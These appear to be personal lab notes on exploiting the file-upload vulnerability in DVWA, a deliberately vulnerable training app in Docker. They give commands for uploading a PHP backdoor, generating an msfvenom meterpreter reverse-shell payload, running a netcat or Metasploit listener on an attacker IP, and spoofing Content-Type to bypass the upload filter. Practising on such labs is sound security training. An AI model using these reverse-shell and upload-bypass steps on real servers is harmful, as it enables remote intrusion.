DVWA Notes

Fix file upload vuln on DVWA docker container

By default, the proper permissions are not set to be able to do the file upload vulnerability properly with something like a PHP backdoor.

To fix this, pop onto the container:

docker exec -i -t <name of the container> /bin/bash

Once you're on, run this command:

chown -R www-data:www-data /app

At this point, you should be able to upload a backdoor like Laudanum and go to town like so (once you've uploaded the backdoor):

# Start the reverse shell from the ip you set in the Laudanum source
netcat -lvp <port you've set in the source>

Alternatively you can use meterpreter by spawning a reverse shell:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<attackers ip> LPORT=4444 -f raw > met_shell.php

Followed by creating a listener (drop this code into evil.rc):

use multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST <attackers ip>
set LPORT 4444
exploit -j -z

and run it:

msfconsole -r evil.rc

Follow this up by uploading the met_shell.php code and triggering it by accessing the code at

http://127.0.0.1:<whatever port you've mapped>/hackable/uploads/
  • Note that this will work only when the security level is set to Low

To make this work with the security level set to medium, you'll need burp suite to intercept the request to upload. Upon intercepting the request, change the Content-Type to:

image/jpeg

Resources

https://www.youtube.com/watch?v=4lFCQGkcD7M&t=7s